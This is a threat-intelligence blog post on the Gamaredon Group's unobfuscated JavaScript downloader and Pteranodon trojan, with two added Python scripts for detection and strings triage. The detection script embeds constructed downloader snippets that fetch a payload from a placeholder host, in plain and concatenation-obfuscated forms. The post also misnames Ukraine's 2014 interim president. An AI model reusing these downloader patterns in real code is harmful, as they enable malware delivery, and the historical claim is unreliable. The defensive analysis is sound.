Gamaredon Group Developing Custom Malware, Failing to Obfuscate Commands

The Gamaredon Group, a presumed Russian hacking unit known for attacking state targets in Ukraine, is in the midst of a shift from relying primarily on commercial malware and attack tools to developing their own, custom-built toolset. Our analysis of Gamaredon’s Pteranodon trojan and one of its JavaScript downloaders revealed that the group is deploying plain-text, unobfuscated code to download additional malware, take screenshots, and execute commands. Thus, while the group is certainly demonstrating a tactical evolution by switching from off-the-shelf to custom tools, a reality first highlighted by Palo Alto Networks, Gamaredon Group’s failure to obscure its code suggests that the group still lacks a level of sophistication in programming.

The Gamaredon Group, which is thought to be responsible for a prior attack campaign called “Operation Armageddon,” targets Ukrainian government, law enforcement, and military officials with the goal of stealing information to be leveraged by the Russian military. This group has been active since at least 2013, according to researchers at Looking Glass, and its cyber-attack profile increased in mid-April 2014 in response to statements made against pro-Russian separatists by then-interim Ukrainian president Viktor Yanukovych.

The Gamaredon Group typically delivers its malware via malicious attachments, including SFX archives and JavaScript downloaders. Some malicious emails also include decoy documents referencing casualties in the Russian-Ukrainian conflict.

Technical analysis

We analyzed two files from the Palo Alto Unit 42 report on custom Gamaredon Group malware. The first of these files, a JavaScript downloader, is depicted in Figure 1 below:

Figure 1: A JavaScript downloader used by the Gamaredon Group


While the logic behind this code is sound, the code contains no obfuscation, making detection by security devices relatively easy. In contrast, more sophisticated droppers use garbage code, variable concatenation, and other techniques to deter analysis and detection (as demonstrated in the below video).
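The detection point above can be made concrete. The following Python script is an added illustration written for this post, not code from the original article or from any sample the article describes: it looks for a handful of generic Windows Script Host and COM names that plain-text script downloaders tend to use, and it shows why simple variable concatenation defeats naive string matching while a detector that first inlines string variables and folds `"a" + "b"` literals still finds the same indicators. The two JavaScript snippets embedded in the script are constructed for the demonstration (the host name `example.invalid` is a placeholder), and the indicator list is an illustrative set rather than anything taken from the Gamaredon downloader.

```python
import re

# Generic WSH/COM names that plain-text script downloaders commonly reference.
# Illustrative list for this example; not indicators taken from the article.
INDICATORS = [
    "WScript.Shell",
    "MSXML2.XMLHTTP",
    "ADODB.Stream",
    "Scripting.FileSystemObject",
    ".Run(",
    "http://",
]

# One double- or single-quoted JavaScript string literal (handles \" escapes).
_STR_LIT = r'''(?:"[^"\\]*(?:\\.[^"\\]*)*"|'[^'\\]*(?:\\.[^'\\]*)*')'''
# Two literals joined by "+", e.g. "WScr" + "ipt.Shell".
_CONCAT = re.compile(r'(' + _STR_LIT + r')\s*\+\s*(' + _STR_LIT + r')')
# Single-assignment string variables, e.g. var p = "WScr";
_ASSIGN = re.compile(r'\bvar\s+([A-Za-z_$][\w$]*)\s*=\s*(' + _STR_LIT + r')\s*;')


def fold_literals(src):
    """Repeatedly merge "a" + "b" into "ab" until no literal concatenation remains.

    The merged contents are joined verbatim, which is sufficient for indicator
    matching (a constant-folding step, not a full JavaScript evaluator)."""
    def merge(m):
        return '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"'
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(merge, src)
    return src


def resolve_vars(src):
    """Inline variables that hold a single string literal.

    Substitution is applied only outside string literals, so text inside a
    quoted string is never rewritten."""
    env = dict(_ASSIGN.findall(src))
    parts = re.split('(' + _STR_LIT + ')', src)   # odd indices are literals
    out = []
    for i, part in enumerate(parts):
        if i % 2 == 0:
            for name, lit in env.items():
                part = re.sub(r'(?<![\w$])' + re.escape(name) + r'(?![\w$])',
                              lambda m, lit=lit: lit, part)
        out.append(part)
    return "".join(out)


def normalize(src):
    """Fold, inline, then fold again so variables built from concatenations resolve."""
    return fold_literals(resolve_vars(fold_literals(src)))


def naive_indicators(src):
    """Plain substring matching on the raw script text."""
    return sorted(i for i in INDICATORS if i.lower() in src.lower())


def find_indicators(src):
    """Substring matching after constant folding and variable inlining."""
    return naive_indicators(normalize(src))


# Constructed sample: an unobfuscated fragment of the kind the article describes.
PLAIN = '''var sh = new ActiveXObject("WScript.Shell");
var req = new ActiveXObject("MSXML2.XMLHTTP");
req.open("GET", "http://example.invalid/payload", false);
'''

# Constructed sample: the same fragment with variable concatenation applied.
CONCAT = '''var p = "WScr";
var q = "ipt.Sh" + "ell";
var sh = new ActiveXObject(p + q);
var req = new ActiveXObject("MSXML2" + ".XMLHTTP");
req.open("GET", "htt" + "p://example.invalid/payload", false);
'''

if __name__ == "__main__":
    print("plain, naive match:     ", naive_indicators(PLAIN))
    print("concat, naive match:    ", naive_indicators(CONCAT))
    print("concat, after folding:  ", find_indicators(CONCAT))
```

Running the script shows the contrast the post is making: the plain-text fragment matches three indicators on a raw substring scan, the concatenated version matches none, and the same concatenated version matches all three once the detector folds its literals. Signature-based tooling that scans script attachments benefits from exactly this kind of normalization pass.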


This lack of obfuscation is also present in the Pteranodon malware. The sample we analyzed contains a hardcoded command-and-control (C2) server in its strings, as well as hardcoded command lists. The malware supports command-line execution, file download and execution, and screenshotting. An example of one of the command-line execution workflows is depicted in Figure 2, with red boxes highlighting the workflow and the unobfuscated strings. As with the JavaScript downloader, the lack of obfuscation around these values suggests a lack of sophistication on the part of the developers.
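Hardcoded C2 addresses and command names are exactly what a first-pass strings triage recovers from an unpacked binary. The script below is an added example written for this post, not code from the article or from the Pteranodon sample: it pulls printable ASCII and UTF-16LE strings out of a byte buffer (Windows binaries frequently store strings in both encodings) and sorts them into URLs, IPv4 addresses, and command-like vocabulary. The buffer it scans is constructed inline for the demonstration, with a placeholder host (`c2.example.invalid`), a documentation-range address (`192.0.2.10`), and invented command words; none of these are indicators from the real malware.

```python
import re

# Command vocabulary to flag. Illustrative words for this example only;
# the real Pteranodon command names are not reproduced here.
COMMAND_WORDS = {"screenshot", "download", "exec", "cmd", "upload", "shell"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[A-Za-z0-9./_\-?=&]*)?")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_strings(blob, min_len=6):
    """Return (encoding, offset, text) for printable runs of at least min_len chars.

    ASCII runs are bytes 0x20-0x7e; UTF-16LE runs are printable bytes each
    followed by a NUL, which is how Windows stores wide strings."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = []
    for m in ascii_re.finditer(blob):
        found.append(("ascii", m.start(), m.group().decode("ascii")))
    for m in wide_re.finditer(blob):
        found.append(("utf-16le", m.start(), m.group().decode("utf-16-le")))
    found.sort(key=lambda item: item[1])
    return found


def triage(blob, min_len=6):
    """Bucket extracted strings into the categories an analyst checks first."""
    report = {"urls": [], "ips": [], "command_like": [], "other": []}
    for _enc, _off, text in extract_strings(blob, min_len):
        if URL_RE.search(text):
            report["urls"].append(text)
        elif IPV4_RE.search(text):
            report["ips"].append(text)
        elif any(word in text.lower() for word in COMMAND_WORDS):
            report["command_like"].append(text)
        else:
            report["other"].append(text)
    return report


# Constructed stand-in for an unpacked binary: header-like junk, an ASCII URL,
# wide-character command names, and an IPv4 literal, separated by non-printable bytes.
SAMPLE = (
    b"MZ\x90\x00" + bytes(range(32))
    + b"http://c2.example.invalid/gate.php\x00"
    + b"\x13\x37" * 5
    + "screenshot".encode("utf-16-le") + b"\x00\x00"
    + "download_exec".encode("utf-16-le") + b"\x00\x00"
    + "cmd_exec".encode("utf-16-le") + b"\x00\x00"
    + b"\x01\x02\x03" + b"192.0.2.10\x00" + b"\xff" * 8
)

if __name__ == "__main__":
    for enc, off, text in extract_strings(SAMPLE):
        print(f"{off:6d}  {enc:8s}  {text}")
    print(triage(SAMPLE))
```

The point for defenders is the one the post makes: when C2 locations and command verbs are stored as plain strings, this level of triage is enough to recover them and turn them into network and host signatures, whereas a packed or string-encrypted sample would yield nothing useful at this stage. Scanning both encodings matters because a tool that only looks for ASCII would miss the wide-character command list in the constructed sample.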

Figure 2: The programming workflow for arbitrary command-line execution in the Pteranodon malware


Because the malware has a limited number of features, we believe that it may be in continued development. Previous tools used by the group, according to Palo Alto Networks, include VNC and Remote Manipulator System, two applications that can be used for monitoring and remote administration. Given that the custom Pteranodon trojan used in new Gamaredon campaigns is only capable of three primary functions (screenshot capture, command line execution, and file downloading), Cyber4Sight assesses that future versions of this trojan may include features that closely align with those offered by VNC and Remote Manipulator System.

Moving forward

Cyber4Sight expects the following future developments to the malware used by Gamaredon Group as it becomes more advanced:

  • Implementation of packing and obfuscation techniques in the droppers and payloads
  • Streamlined delivery and installation procedures
  • Implementation of additional features to mirror the functionality of third-party tools, including keylogging and video capture


Image via Daniel Haußmann licensed under Creative Commons

Article Link: https://blog.cyber4sight.com/2017/03/gamaredon-group-developing-custom-malware-failing-to-obfuscated-commands/